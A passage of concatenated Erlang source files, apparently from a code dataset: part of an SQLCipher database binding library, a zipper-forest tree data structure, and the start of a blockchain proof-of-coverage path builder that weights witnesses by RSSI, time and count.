Else -> Else
end.
%% @equiv bind(Statement, Args, 5000)
-spec bind(statement(), [bind_value()]) -> ok | sqlite_error().
bind(Statement, Values) ->
bind(Statement, Values, ?DEFAULT_TIMEOUT).
%% @doc Bind values to a prepared statement created by {@link prepare/3}.
%% Note that you can also use {@link prepare_bind/4} to prepare and bind a
%% statement in one step.
%%
%% `nil' will be interpreted as `NULL'.
%% Use ``{'$blob', <<binary>>}'' for sqlite `BLOB's.
%% Since sqlite does not have a true boolean type, `true' and `false' are invalid;
%% use `1' and `0', respectively.
%%
%% All forms of bindings supported by sqlite3 are supported
%% (see also <a href="https://www.sqlite.org/lang_expr.html#varparam">sqlite3 docs</a>):
%% <ul>
%% <li>`?': Unnamed/anonymous parameters (these will implicitly be assigned a
%% number that is the previously largest assigned number + 1; numbering
%% begins at 1),</li>
%% <li>`?NNN', where 1 ≤ `NNN' ≤ 32766: Numbered parameters, and</li>
%% <li>`:AAA', where `AAA' is an alphanumeric identifier. These will internally
%% be assigned a number similarly to anonymous parameters, so <b>do not
%% mix named and numbered parameters</b> or you will probably get
%% unexpected results.<br/>
%% <small><i>Sqlite3 also supports the forms `@AAA' and `$AAA' but since
%% the initial character (`@'/`$') is part of the name, you would
%% actually need to pass ``{'@name', Value}'' or ``{'$name', Value}''.
%% `{name, Value}' is automatically interpreted as ``{':name', Value}'',
%% so the `:AAA' form should be preferred. Do not use `$blob' as a
%% parameter name as ``{'$blob', _}'' tuple will be interpreted as the
%% sqlite `BLOB' datatype.</i></small></li>
%% </ul>
%% Anonymous parameters of the form `?' are discouraged; <b>prefer named <i>or</i>
%% numbered parameters</b>.
%%
%% `Values' is a list of values that are bound to these parameters. Values can
%% either be a list of raw values or a list of tuples of the form `{N, Value}' or
%% `{name, Value}'. Of course, something like ``{myblob, {'$blob', <<"blob">>}}''
%% is allowed as well.
-spec bind(Statement :: statement(), [bind_value()], timeout()) -> ok | sqlite_error().
bind({statement, Stmt, {connection, Conn, _}}, Values, Timeout) ->
Ref = make_ref(),
ok = esqlcipher_nif:bind(Conn, Stmt, Ref, self(), bind_values(Values, 1)),
receive_answer(Ref, Timeout).
%% @doc Transforms a list of bind arguments into a list of tuples that have
%% either a name or a parameter index in the scheme
%% <a href="https://www.sqlite.org/lang_expr.html#varparam">used by sqlite3</a>.
%% @private
-spec bind_values([bind_value()], pos_integer()) -> [{atom() | pos_integer(), sql_value()}].
bind_values([], _) -> [];
bind_values([{N, Value} | Values], I) when is_integer(N) ->
true = N > 0,
II = if N >= I -> N + 1; true -> I end,
[{N, Value} | bind_values(Values, II)];
bind_values([{Name, Value} | Values], I) when is_atom(Name), Name =/= '$blob' ->
[{Name, Value} | bind_values(Values, I + 1)];
bind_values([Value | Values], I) ->
[{I, Value} | bind_values(Values, I + 1)].
%% @equiv prepare_bind(Sql, Values, Connection, 5000)
-spec prepare_bind(sql(), [bind_value()], connection()) -> {ok, statement()} | sqlite_error().
prepare_bind(Sql, Values, Connection) ->
prepare_bind(Sql, Values, Connection, ?DEFAULT_TIMEOUT).
%% @doc Prepare an SQL statement and bind values to it.
%% This is simply {@link prepare/3} and {@link bind/3} in a single step.
-spec prepare_bind(sql(), [bind_value()], connection(), timeout()) -> {ok, statement()} | sqlite_error().
prepare_bind(Sql, [], {connection, _, _}=Connection, Timeout) ->
prepare(Sql, Connection, Timeout);
prepare_bind(Sql, Values, {connection, _, _}=Connection, Timeout) ->
case prepare(Sql, Connection, Timeout) of
{ok, Statement} ->
case bind(Statement, Values, Timeout) of
ok -> {ok, Statement};
{error, _} = Error -> Error
end;
{error, _} = Error ->
Error
end.
%% @equiv reset(Statement, false, 5000)
-spec reset(statement()) -> ok | sqlite_error().
reset(Statement) ->
reset(Statement, false, ?DEFAULT_TIMEOUT).
%% @equiv reset(Statemennt, ClearValues, 5000)
-spec reset(statement(), boolean() | timeout()) -> ok | sqlite_error().
reset(Statement, ClearValues) when is_boolean(ClearValues) ->
reset(Statement, ClearValues, ?DEFAULT_TIMEOUT);
reset(Statement, Timeout) when is_integer(Timeout); Timeout == infinity ->
reset(Statement, false, Timeout).
%% @doc Reset the prepared statement back to its initial state.
%% Once the statement has been reset, you can run it once more. By default, any
%% values bound to the statement will be retained. Set `ClearValues' to `true'
%% to change this.
%% @param ClearValues whether to clear values bound to the statement
-spec reset(Statement :: statement(), boolean(), timeout()) -> ok | sqlite_error().
reset({statement, Stmt, {connection, Conn, _}}, ClearValues, Timeout) ->
Ref = make_ref(),
ok = esqlcipher_nif:reset(Conn, Stmt, Ref, self(), ClearValues),
receive_answer(Ref, Timeout).
%% @doc attempt to fetch multiple results in one call.
%% Returns rows in reverse order
%% @private
-spec multi_step(statement(), pos_integer(), timeout()) ->
{rows, [row()]} |
{'$busy', [row()]} |
{'$done', [row()]} |
sqlite_error().
multi_step({statement, Stmt, {connection, Conn, _}}, ChunkSize, Timeout) ->
Ref = make_ref(),
ok = esqlcipher_nif:multi_step(Conn, Stmt, ChunkSize, Ref, self()),
receive_answer(Ref, Timeout).
%% @doc retry `multi_step' a number of times if the database is busy.
%% Returns rows in reverse order
%% @private
-spec try_multi_step(statement(), pos_integer(), [row()], non_neg_integer(), timeout()) ->
{rows, [row()]} | {'$done', [row()]} | sqlite_error().
try_multi_step(_Statement, _ChunkSize, _Rest, Tries, _Timeout) when Tries > ?MAX_TRIES ->
{error, {busy, "database is busy"}};
try_multi_step(Statement, ChunkSize, Rest, Tries, Timeout) ->
case multi_step(Statement, ChunkSize, Timeout) of
{'$busy', Rows} ->
% NB: It's possible that the database becomes busy only after a number
% of rows have already been fetched.
% Exponential backoff:
timer:sleep(50 + trunc(math:pow(2, Tries)) * 10),
try_multi_step(Statement, ChunkSize, Rows ++ Rest, Tries + 1, Timeout);
{rows, Rows} ->
{rows, Rows ++ Rest};
{'$done', Rows} ->
{'$done', Rows ++ Rest};
Else -> Else
end.
%% @equiv fetch_chunk(Statement, ChunkSize, 5000)
-spec fetch_chunk(statement(), pos_integer()) -> {rows | '$done', [row()]} | sqlite_error().
fetch_chunk(Statement, ChunkSize) ->
fetch_chunk(Statement, ChunkSize, ?DEFAULT_TIMEOUT).
%% @doc fetch a number of rows.
%% Can be called multiple times to fetch more rows.
%% @param Statement a prepared sql statement created by {@link prepare/3} or {@link prepare_bind/4}
%% @param ChunkSize is a number of rows to be read from sqlite and sent to erlang
%% @param Timeout timeout for the whole operation. Might need to be increased for very large chunks
%% @returns `{rows, [...]}' if more rows exist but where not fetched due to the `ChunkSize' limit;
%% ``{'$done', [...]}'' if these where the last rows
-spec fetch_chunk(statement(), pos_integer(), timeout()) ->
{rows | '$done', [row()]} | sqlite_error().
fetch_chunk(Statement, ChunkSize, Timeout) when ChunkSize > 0 ->
try_multi_step(Statement, ChunkSize, [], 0, Timeout).
%% @equiv fetch_one(Statement, 5000)
-spec fetch_one(statement()) -> {ok, nil} | {ok, row()} | sqlite_error().
fetch_one(Statement) ->
fetch_one(Statement, ?DEFAULT_TIMEOUT).
%% @doc fetch exactly one row of results. Returns `ok' if the result is empty.
%% @param Statement a prepared sql statement created by {@link prepare/3} or {@link prepare_bind/4}
%% @returns `{ok, X}' if the statement was executed successfully where `X' is
%% either a row in the shape of a list or `nil' if no rows where returned
-spec fetch_one(statement(), timeout()) -> {ok, nil} | {ok, row()} | sqlite_error().
fetch_one(Statement, Timeout) ->
case fetch_chunk(Statement, 1, Timeout) of
{error, _} = Error -> Error;
{'$done', []} -> {ok, nil};
{rows, [Row]} -> {ok, Row}
end.
%% @equiv run(Statement, 5000)
-spec run(statement()) -> ok | sqlite_error().
run(Statement) ->
run(Statement, ?DEFAULT_TIMEOUT).
%% @doc run a prepared statement, ignoring any possible results.
%% If you want to ensure that a query finishes correctly, returning exactly zero
%% rows, use:
%%
%% `{ok, nil} =' {@link fetch_one/2. `fetch_one'}`(Statement, Timeout)'
%%
%% @returns `ok' if the query finishes without an error,
%% whether or not it returns any rows.
-spec run(statement(), timeout()) -> ok | sqlite_error().
run(Statement, Timeout) ->
case fetch_one(Statement, Timeout) of
{ok, _} -> ok;
Else -> Else
end.
%% @equiv fetch_all(Statement, 5000, 5000)
-spec fetch_all(statement()) -> [row()] | sqlite_error().
fetch_all(Statement) ->
fetch_all(Statement, ?DEFAULT_CHUNK_SIZE, ?DEFAULT_TIMEOUT).
%% @equiv fetch_all(Statement, ChunkSize, 5000)
-spec fetch_all(statement(), pos_integer()) -> [row()] | sqlite_error().
fetch_all(Statement, ChunkSize) ->
fetch_all(Statement, ChunkSize, ?DEFAULT_TIMEOUT).
%% @doc Fetch all records
%% @param Statement a prepared sql statement created by {@link prepare/3} or {@link prepare_bind/4}
%% @param ChunkSize is a number of rows to be read from sqlite and sent to erlang in one bulk
%% Decrease this value if rows are heavy. Default value is 5000 (`DEFAULT_CHUNK_SIZE').
%% @param Timeout is timeout per each request of one bulk
-spec fetch_all(statement(), pos_integer(), timeout()) -> [row()] | sqlite_error().
fetch_all(Statement, ChunkSize, Timeout) ->
case fetch_all_internal(Statement, ChunkSize, [], Timeout) of
{'$done', Rows} -> lists:reverse(Rows);
{error, _} = Error -> Error
end.
%% @doc Fetches all rows in chunk. Rows are returned in reverse order.
%% @private
-spec fetch_all_internal(statement(), pos_integer(), [row()], timeout()) ->
{'$done', [row()]} | sqlite_error().
fetch_all_internal(Statement, ChunkSize, Rest, Timeout) ->
case try_multi_step(Statement, ChunkSize, Rest, 0, Timeout) of
{rows, Rows} -> fetch_all_internal(Statement, ChunkSize, Rows, Timeout);
Else -> Else
end.
%% @equiv changes(Connection, 5000)
changes(Connection) ->
changes(Connection, ?DEFAULT_TIMEOUT).
%% @doc Return the number of the rows that have been modified, inserted, or
%% deleted by the last statement (see the
%% <a href="https://www.sqlite.org/c3ref/changes.html">sqlite3 docs</a> for
%% further information).
-spec changes(Connection :: connection(), timeout()) -> integer().
changes({connection, Connection, _}, Timeout) ->
Ref = make_ref(),
ok = esqlcipher_nif:changes(Connection, Ref, self()),
receive_answer(Ref, Timeout).
%% @equiv column_names(Statement, 5000)
-spec column_names(statement()) -> [binary()].
column_names(Statement) ->
column_names(Statement, ?DEFAULT_TIMEOUT).
%% @doc Return the column names of the prepared statement.
-spec column_names(Statement :: statement(), timeout()) -> [binary()].
column_names({statement, Stmt, {connection, Conn, _}}, Timeout) ->
Ref = make_ref(),
ok = esqlcipher_nif:column_names(Conn, Stmt, Ref, self()),
{ok, ColumnNames} = receive_answer(Ref, Timeout),
ColumnNames.
%% @equiv column_types(Statement, 5000)
-spec column_types(statement()) -> [binary()].
column_types(Stmt) ->
column_types(Stmt, ?DEFAULT_TIMEOUT).
%% @doc Return the declared column types of the prepared statement.
%% Note that since sqlite3 is dynamically typed, actual column values need not
%% necessarily conform to the declared type
-spec column_types(statement(), timeout()) -> [binary()].
column_types({statement, Stmt, {connection, Conn, _}}, Timeout) ->
Ref = make_ref(),
ok = esqlcipher_nif:column_types(Conn, Stmt, Ref, self()),
{ok, ColumnTypes} = receive_answer(Ref, Timeout),
ColumnTypes.
%% @equiv get_autocommit(Connection, 5000)
-spec get_autocommit(connection()) -> boolean().
get_autocommit(Connection) ->
get_autocommit(Connection, ?DEFAULT_TIMEOUT).
%% @doc Returns whether the database is in <a href="https://sqlite.org/c3ref/get_autocommit.html">autocommit mode</a>.
%% Autocommit is normally enabled, except within transactions.
-spec get_autocommit(Connection :: connection(), timeout()) -> boolean().
get_autocommit({connection, Connection, _}, Timeout) ->
Ref = make_ref(),
ok = esqlcipher_nif:get_autocommit(Connection, Ref, self()),
receive_answer(Ref, Timeout).
%% @equiv q(Sql, [], Connection, 5000)
%% @throws sqlite_error()
-spec q(sql(), connection()) -> [row()].
q(Sql, Connection) ->
q(Sql, [], Connection, ?DEFAULT_TIMEOUT).
%% @equiv q(Sql, Args, Connection, 5000)
%% @throws sqlite_error()
-spec q(sql(), [bind_value()], connection()) -> [row()].
q(Sql, Args, Connection) ->
q(Sql, Args, Connection, ?DEFAULT_TIMEOUT).
%% @doc Prepare statement, bind args and return a list of rows as result.
%% Errors are thrown, not returned.
%% @throws sqlite_error()
-spec q(sql(), [bind_value()], connection(), timeout()) -> [row()].
q(Sql, Args, Connection, Timeout) ->
case prepare_bind(Sql, Args, Connection, Timeout) of
{ok, Statement} ->
case fetch_all(Statement, ?DEFAULT_CHUNK_SIZE, Timeout) of
{error, _} = Error ->
throw(Error);
Res ->
Res
end;
{error, _} = Error ->
throw(Error)
end.
%% @equiv map(F, Sql, [], Connection, 5000)
%% @throws sqlite_error()
-spec map(map_function(Type), sql(), connection()) -> [Type].
map(F, Sql, {connection, _, _} = Connection) ->
map(F, Sql, [], Connection, ?DEFAULT_TIMEOUT).
%% @equiv map(F, Sql, [], Connection, 5000)
%% @throws sqlite_error()
-spec map(map_function(Type), sql(), [bind_value()], connection()) -> [Type].
map(F, Sql, Args, Connection) ->
map(F, Sql, Args, Connection, ?DEFAULT_TIMEOUT).
%% @doc Map over all rows returned by the SQL query `Sql'.
%% @param A function that takes either one parameter (a row) or two
%% (a column name list and a row) and returns any kind of value
%% @param Sql an SQL query
%% @param Args values that are bound to `Sql'
%% @throws sqlite_error()
-spec map(map_function(Type), sql(), [bind_value()], connection(), timeout()) -> [Type].
map(F, Sql, Args, Connection, Timeout) ->
case prepare_bind(Sql, Args, Connection, Timeout) of
{ok, Statement} ->
ColumnNames = column_names(Statement, Timeout),
map_s(F, Statement, ColumnNames, Timeout);
{error, _Msg} = Error ->
throw(Error)
end.
%% @doc Map function over statement results
%% @private
-spec map_s(map_function(Type), statement(), [binary()], timeout()) -> [Type].
map_s(F, Statement, ColNames, Timeout) when is_function(F, 1) ->
case fetch_one(Statement, Timeout) of
{ok, nil} -> [];
{ok, Row} -> [F(Row) | map_s(F, Statement, ColNames, Timeout)];
{error, _} = Error -> throw(Error)
end;
map_s(F, Statement, ColNames, Timeout) when is_function(F, 2) ->
case fetch_one(Statement, Timeout) of
{ok, nil} -> [];
{ok, Row} -> [F(ColNames, Row) | map_s(F, Statement, ColNames, Timeout)];
{error, _} = Error -> throw(Error)
end.
%% @equiv foreach(F, Sql, [], Connection, 5000)
%% @throws sqlite_error()
-spec foreach(foreach_function(), sql(), connection()) -> ok.
foreach(F, Sql, {connection, _, _} = Connection) ->
foreach(F, Sql, [], Connection, ?DEFAULT_TIMEOUT).
%% @equiv foreach(F, Sql, Args, Connection, 5000)
%% @throws sqlite_error()
-spec foreach(foreach_function(), sql(), [bind_value()], connection()) -> ok.
foreach(F, Sql, Args, Connection) ->
foreach(F, Sql, Args, Connection, ?DEFAULT_TIMEOUT).
%% @doc Execute a function for all rows returned by the SQL query `Sql'.
%% @param A function that takes either one parameter (a row) or two
%% (a column name list and a row). Return values are ignored.
%% @param Sql an SQL query
%% @param Args values that are bound to `Sql'
%% @throws sqlite_error()
-spec foreach(foreach_function(), sql(), [bind_value()], connection(), timeout()) -> ok.
foreach(F, Sql, Args, Connection, Timeout) ->
case prepare_bind(Sql, Args, Connection, Timeout) of
{ok, Statement} ->
ColumnNames = column_names(Statement, Timeout),
ok = foreach_s(F, Statement, ColumnNames, Timeout);
{error, _Msg} = Error ->
throw(Error)
end.
%% @doc Run function for each row
%% @private
-spec foreach_s(foreach_function(), statement(), [binary()], timeout()) -> ok.
foreach_s(F, Statement, ColNames, Timeout) when is_function(F, 1) ->
case fetch_one(Statement, Timeout) of
{ok, nil} -> ok;
{ok, Row} ->
F(Row),
foreach_s(F, Statement, ColNames, Timeout);
{error, _} = Error -> throw(Error)
end;
foreach_s(F, Statement, ColNames, Timeout) when is_function(F, 2) ->
case fetch_one(Statement, Timeout) of
{ok, nil} -> ok;
{ok, Row} ->
F(ColNames, Row),
foreach_s(F, Statement, ColNames, Timeout);
{error, _} = Error -> throw(Error)
end.
%% @doc Wait for an answer for the request referred as `Ref'.
%% @private
-spec receive_answer(reference(), timeout()) -> term().
receive_answer(Ref, Timeout) ->
Start = os:timestamp(),
receive
{esqlcipher_raise, Ref, Error} ->
error(Error);
{esqlcipher, Ref, Resp} ->
Resp;
{Type, _, _} = StaleAnswer when (Type == esqlcipher) or (Type == esqlcipher_raise) ->
error_logger:warning_msg("Esqlcipher: Ignoring stale answer ~p~n", [StaleAnswer]),
PassedMics = timer:now_diff(os:timestamp(), Start) div 1000,
NewTimeout = case Timeout - PassedMics of
Passed when Passed < 0 -> 0;
TO -> TO
end,
receive_answer(Ref, NewTimeout)
after Timeout ->
throw({error, timeout, Ref})
end. | src/esqlcipher.erl | 0.634883 | 0.58599 | esqlcipher.erl | starcoder |
%% @author <NAME> <<EMAIL>> [http://ferd.ca/]
%% @doc Zipper forests are the zipper equivalent of a tree where each
%% node is a list of subtrees. The term is chosen because a forest, in graph
%% theory, means an undirected acyclic graphs, which is precisely the shape
%% such a tree can represent. The advantage of the zipper forest is that it
%% allows the graph/tree to be navigated in an iterative manner.
%% Potential uses of such a forest can be to represent a minimum spanning tree,
%% a DOM document, an undo tree, etc.
%% Adding, replacing and deleting items is done in amortized constant time.
%% Note that zippers are not search data structures.
%% @reference See <a href="http://ferd.ca/yet-another-article-on-zippers.html">
%% the related blog post</a> for more basic details on the concept of zippers
-module(zipper_forests).
-export([root/1, value/1,
replace/2, insert/2, delete/1,
prev/1, next/1, children/1, parent/1, rparent/1]).
-export_type([zipper_forest/0]).
-type zlist(A) :: {Prev::list(A), Next::list(A)}.
-type znode() :: zlist({term(), zlist(_)}). % znode is a zlist of nodes
-type thread() :: [znode()].
%% @type zipper_forest(). A zipper forest data structure.
-type zipper_forest() :: {thread(), znode()}.
%% @doc creates an empty zipper forest with <var>Val</var> as the first
%% element in it.
-spec root(Val::term()) -> zipper_forest().
root(Val) -> {[], {[], [{Val, {[], []}}]}}.
%% @doc Extracts the node's value from the current tree position.
%% If no item exists at the current position, the atom <code>undefined</code>
%% is returned.
-spec value(zipper_forest()) -> {ok, term()} | undefined.
value({_Thread, {_Prev, []}}) -> undefined;
value({_Thread, {_Prev, [{Val, _Children} | _Next]}}) -> {ok, Val}.
%% @doc Replaces the value from at the current tree position, without touching
%% the children nodes.
-spec replace(term(), zipper_forest()) -> zipper_forest().
replace(Val, {T, {L, [{_Val, Children}|R]}}) ->
{T, {L, [{Val,Children}|R]}}.
%% @doc Add a new node at the current position with the value Val.
-spec insert(term(), zipper_forest()) -> zipper_forest().
insert(Val, {Thread, {L, R}}) ->
{Thread, {L, [{Val, {[], []}} | R]}}.
%% @doc Deletes the node at the current position and its children.
%% The next one becomes the current position.
-spec delete(zipper_forest()) -> zipper_forest().
delete({Thread, {L, [_|R]}}) ->
{Thread, {L, R}}.
%% @doc Moves to the previous node of the current level. If no
%% such node exists, the atom <code>undefined</code> is returned.
-spec prev(zipper_forest()) -> zipper_forest() | undefined.
prev({_Thread, {[], _Next}}) ->
undefined;
prev({Thread, {[H|T], R}}) ->
{Thread, {T, [H|R]}}.
%% @doc Moves to the next node of the current level. If no
%% such node exists, the atom <code>undefined</code> is returned.
-spec next(zipper_forest()) -> zipper_forest() | undefined.
next({_Thread, {_Prev, []}}) ->
undefined;
next({Thread, {L, [H|T]}}) ->
{Thread, {[H|L], T}}.
%% @doc Goes down one level to the children of the current node.
%% If the current node is undefined, the atom <code>undefined</code>
%% is returned.
%% @end
%% Note that in order for this to work, the {Val, Children} tuple
%% needs to be broken in two: the value goes in the Thread's zlist
%% while the Children become the current level.
-spec children(zipper_forest()) -> zipper_forest() | undefined.
children({_Thread, {_L,[]}}) ->
undefined;
children({Thread, {L, [{Val, Children}|R]}}) ->
{[{L,[Val|R]}|Thread], Children}.
%% @doc Moves up to the direct parent level. Doesn't rewind the current
%% level's child list. This means that if you have a tree, go to the
%% children, browse to the next element 2-3 times, then go back up and
%% down to the children again, you'll be at the same position you were
%% before. If no parent exists, the atom <code>undefined</code> is returned.
%% If you prefer the children to be <em>rewinded</em>, use
%% {@link rparent/1. <code>rparent/1</code>}
-spec parent(zipper_forest()) -> zipper_forest() | undefined.
parent({[], _Children}) ->
undefined;
parent({[{L, [Val|R]}|Thread], Children}) ->
{Thread, {L, [{Val, Children}|R]}}.
%% @doc Moves up to the direct parent level, much like
%% {@link parent/1. <code>parent/1</code>}, However,
%% it rewinds the current level's list before doing so. This allows
%% the programmer to access children as if it were the first time,
%% all the time.
%% If no parent exists, the atom <code>undefined</code> is returned.
-spec rparent(zipper_forest()) -> zipper_forest() | undefined.
rparent({[], _Children}) ->
undefined;
rparent({[{ParentL, [Val|ParentR]}|Thread], {L, R}}) ->
{Thread, {ParentL, [{Val, {[], lists:reverse(L)++R}}|ParentR]}}. | src/zipper_forests.erl | 0.576184 | 0.708326 | zipper_forests.erl | starcoder |
%%%-----------------------------------------------------------------------------
%%% @doc blockchain_poc_path_v4 implementation.
%%%
%%% The way paths are built depends solely on witnessing data we have accumulated
%%% in the blockchain ledger.
%%%
%%% Assuming we already have a `TargetPubkeyBin` and `TargetRandState` using `target_v3:target`.
%%% We recursively start building a path starting at `TargetPubkeyBin`.
%%%
%%% Each potential hop's witnesses goes through the following checks:
%%%
%%% * Don't include any witnesses in any parent cell we've already visited
%%% * Don't include any witness whose parent is the same as the gateway we're looking at
%%% * Don't include any witness whose parent is too close to any of the indices we've already seen
%%% * Don't include any witness who have bad rssi range
%%% * Don't include any witness who are too far from the current gateway
%%% * Dont include any witness who do not have the required capability
%%%
%%% We then assign cumulative probabilities to each filtered witness. Each of those
%%% probabilities have an associated weight to them governed by chain variables.
%%% Currently supported weights are:
%%%
%%% * time_weight
%%% * rssi_weight
%%% * count_weight
%%% * randomness_wt
%%% * centrality_wt
%%%
%%% We scale these probabilities and run an ICDF to select the witness from
%%% the witness list. Once we have a potential next hop, we simply do the same process
%%% for the next hop and continue building till the path limit is reached or there
%%% are no more witnesses to continue with.
%%%
%%%-----------------------------------------------------------------------------
-module(blockchain_poc_path_v4).
-export([
build/5
]).
-include("blockchain_utils.hrl").
-include("blockchain_vars.hrl").
-include("blockchain_caps.hrl").
-type path() :: [libp2p_crypto:pubkey_bin()].
-type prob_map() :: #{libp2p_crypto:pubkey_bin() => float()}.
%% @doc Build a path starting at `TargetPubkeyBin`.
-spec build(TargetPubkeyBin :: libp2p_crypto:pubkey_bin(),
TargetRandState :: rand:state(),
Ledger :: blockchain:ledger(),
HeadBlockTime :: pos_integer(),
Vars :: map()) -> path().
build(TargetPubkeyBin, TargetRandState, Ledger, HeadBlockTime, Vars) ->
TargetGw = find(TargetPubkeyBin, Ledger),
TargetGwLoc = blockchain_ledger_gateway_v2:location(TargetGw),
build_(TargetPubkeyBin,
Ledger,
HeadBlockTime,
Vars,
TargetRandState,
[TargetGwLoc],
[TargetPubkeyBin]).
%%%-------------------------------------------------------------------
%% Helpers
%%%-------------------------------------------------------------------
-spec build_(TargetPubkeyBin :: libp2p_crypto:pubkey_bin(),
Ledger :: blockchain:ledger(),
HeadBlockTime :: pos_integer(),
Vars :: map(),
RandState :: rand:state(),
Indices :: [h3:h3_index()],
Path :: path()) -> path().
build_(TargetPubkeyBin,
Ledger,
HeadBlockTime,
#{poc_path_limit := Limit} = Vars,
RandState,
Indices,
Path) when length(Path) < Limit ->
%% Try to find a next hop
case next_hop(TargetPubkeyBin, Ledger, HeadBlockTime, Vars, RandState, Indices) of
{error, _} ->
lists:reverse(Path);
{ok, {WitnessPubkeyBin, NewRandState}} ->
%% Try the next hop in the new path, continue building forward
NextHopGw = find(WitnessPubkeyBin, Ledger),
Index = blockchain_ledger_gateway_v2:location(NextHopGw),
NewPath = [WitnessPubkeyBin | Path],
build_(WitnessPubkeyBin,
Ledger,
HeadBlockTime,
Vars,
NewRandState,
[Index | Indices],
NewPath)
end;
build_(_TargetPubkeyBin, _Ledger, _HeadBlockTime, _Vars, _RandState, _Indices, Path) ->
lists:reverse(Path).
-spec next_hop(GatewayBin :: libp2p_crypto:pubkey_bin(),
Ledger :: blockchain:ledger(),
HeadBlockTime :: pos_integer(),
Vars :: map(),
RandState :: rand:state(),
Indices :: [h3:h3_index()]) -> {error, no_witness} |
{error, all_witnesses_too_close} |
{error, zero_weight} |
{ok, {libp2p_crypto:pubkey_bin(), rand:state()}}.
next_hop(GatewayBin, Ledger, HeadBlockTime, Vars, RandState, Indices) ->
%% Get gateway
Gateway = find(GatewayBin, Ledger),
case blockchain_ledger_gateway_v2:witnesses(GatewayBin, Gateway, Ledger) of
W when map_size(W) == 0 ->
{error, no_witness};
Witnesses0 ->
{RandState1, Witnesses} = limit_witnesses(Vars, RandState, Witnesses0),
%% If this gateway has witnesses, it is implied that it's location cannot be undefined
GatewayLoc = blockchain_ledger_gateway_v2:location(Gateway),
%% Filter witnesses
FilteredWitnesses = filter_witnesses(GatewayLoc, Indices, Witnesses, Ledger, Vars),
case maps:size(FilteredWitnesses) of
S when S > 0 ->
%% Assign probabilities to filtered witnesses
%% P(WitnessRSSI) = Probability that the witness has a good (valid) RSSI.
PWitnessRSSI = rssi_probs(FilteredWitnesses, Vars),
%% P(WitnessTime) = Probability that the witness timestamp is not stale.
PWitnessTime = time_probs(HeadBlockTime, FilteredWitnesses, Vars),
%% P(WitnessCount) = Probability that the witness is infrequent.
PWitnessCount = witness_count_probs(FilteredWitnesses, Vars),
%% P(RSSICentrality) = Probability that the witness rssi lies within a good range
PWitnessRSSICentrality = witness_rssi_centrality_probs(FilteredWitnesses, Vars),
%% P(Witness) = RSSIWeight*P(WitnessRSSI) + TimeWeight*P(WitnessTime) + CountWeight*P(WitnessCount)
PWitness = witness_prob(Vars, PWitnessRSSI, PWitnessTime, PWitnessCount, PWitnessRSSICentrality),
PWitnessList = lists:keysort(1, maps:to_list(PWitness)),
%% Select witness using icdf
{RandVal, NewRandState} = rand:uniform_s(RandState1),
case blockchain_utils:icdf_select(PWitnessList, RandVal) of
{error, _}=E ->
E;
{ok, SelectedWitnessPubkeybin} ->
{ok, {SelectedWitnessPubkeybin, NewRandState}}
end;
_ ->
{error, all_witnesses_too_close}
end
end.
-spec witness_prob(Vars :: map(),
PWitnessRSSI :: prob_map(),
PWitnessTime :: prob_map(),
PWitnessCount :: prob_map(),
PWitnessRSSICentrality :: prob_map()) -> prob_map().
witness_prob(Vars, PWitnessRSSI, PWitnessTime, PWitnessCount, PWitnessRSSICentrality) ->
%% P(Witness) = RSSIWeight*P(WitnessRSSI) + TimeWeight*P(WitnessTime) + CountWeight*P(WitnessCount)
maps:map(fun(WitnessPubkeyBin, PTime) ->
?normalize_float((time_weight(Vars) * PTime), Vars) +
?normalize_float(rssi_weight(Vars) * maps:get(WitnessPubkeyBin, PWitnessRSSI), Vars) +
?normalize_float(count_weight(Vars) * maps:get(WitnessPubkeyBin, PWitnessCount), Vars) +
%% NOTE: The randomness weight is always multiplied with a probability of 1.0
%% So we can do something like:
%% - Set all the other weights to 0.0
%% - Set randomness_wt to 1.0
%% Doing that would basically eliminate the other associated weights and
%% make each witness have equal 1.0 probability of getting picked as next hop
?normalize_float((randomness_wt(Vars) * 1.0), Vars) +
?normalize_float((centrality_wt(Vars) * maps:get(WitnessPubkeyBin, PWitnessRSSICentrality)), Vars)
end, PWitnessTime).
-spec rssi_probs(Witnesses :: blockchain_ledger_gateway_v2:witnesses(),
Vars :: map()) -> prob_map().
rssi_probs(Witnesses, _Vars) when map_size(Witnesses) == 1 ->
assign_single_witness_prob(Witnesses);
rssi_probs(Witnesses, Vars) ->
WitnessList = maps:to_list(Witnesses),
lists:foldl(fun({WitnessPubkeyBin, Witness}, Acc) ->
try
blockchain_ledger_gateway_v2:witness_hist(Witness)
of
RSSIs ->
SumRSSI = lists:sum(maps:values(RSSIs)),
BadRSSI = maps:get(28, RSSIs, 0),
case {SumRSSI, BadRSSI} of
{0, _} ->
%% No RSSI but we have it in the witness list,
%% possibly because of next hop poc receipt.
maps:put(WitnessPubkeyBin, prob_no_rssi(Vars), Acc);
{_S, 0} ->
%% No known bad rssi value
maps:put(WitnessPubkeyBin, prob_good_rssi(Vars), Acc);
{S, S} ->
%% All bad RSSI values
maps:put(WitnessPubkeyBin, prob_bad_rssi(Vars), Acc);
{S, B} ->
%% Invert the "bad" probability
maps:put(WitnessPubkeyBin, ?normalize_float((1 - ?normalize_float(B/S, Vars)), Vars), Acc)
end
catch
error:no_histogram ->
maps:put(WitnessPubkeyBin, prob_no_rssi(Vars), Acc)
end
end, #{},
WitnessList).
-spec time_probs(HeadBlockTime :: pos_integer(),
Witnesses :: blockchain_ledger_gateway_v2:witnesses(),
Vars :: map()) -> prob_map().
time_probs(_, Witnesses, _Vars) when map_size(Witnesses) == 1 ->
assign_single_witness_prob(Witnesses);
time_probs(HeadBlockTime, Witnesses, Vars) ->
Deltas = lists:foldl(fun({WitnessPubkeyBin, Witness}, Acc) ->
case blockchain_ledger_gateway_v2:witness_recent_time(Witness) of
undefined ->
maps:put(WitnessPubkeyBin, nanosecond_time(HeadBlockTime), Acc);
T ->
maps:put(WitnessPubkeyBin, (nanosecond_time(HeadBlockTime) - T), Acc)
end
end, #{},
maps:to_list(Witnesses)),
DeltaSum = lists:sum(maps:values(Deltas)),
%% NOTE: Use inverse of the probabilities to bias against staler witnesses, hence the one minus
maps:map(fun(_WitnessPubkeyBin, Delta) ->
case ?normalize_float((1 - ?normalize_float(Delta/DeltaSum, Vars)), Vars) of
0.0 ->
%% There is only one
1.0;
X ->
X
end
end, Deltas).
-spec witness_count_probs(Witnesses :: blockchain_ledger_gateway_v2:witnesses(),
Vars :: map()) -> prob_map().
witness_count_probs(Witnesses, _Vars) when map_size(Witnesses) == 1 ->
assign_single_witness_prob(Witnesses);
witness_count_probs(Witnesses, Vars) ->
TotalRSSIs = maps:map(fun(_WitnessPubkeyBin, Witness) ->
RSSIs = blockchain_ledger_gateway_v2:witness_hist(Witness),
lists:sum(maps:values(RSSIs))
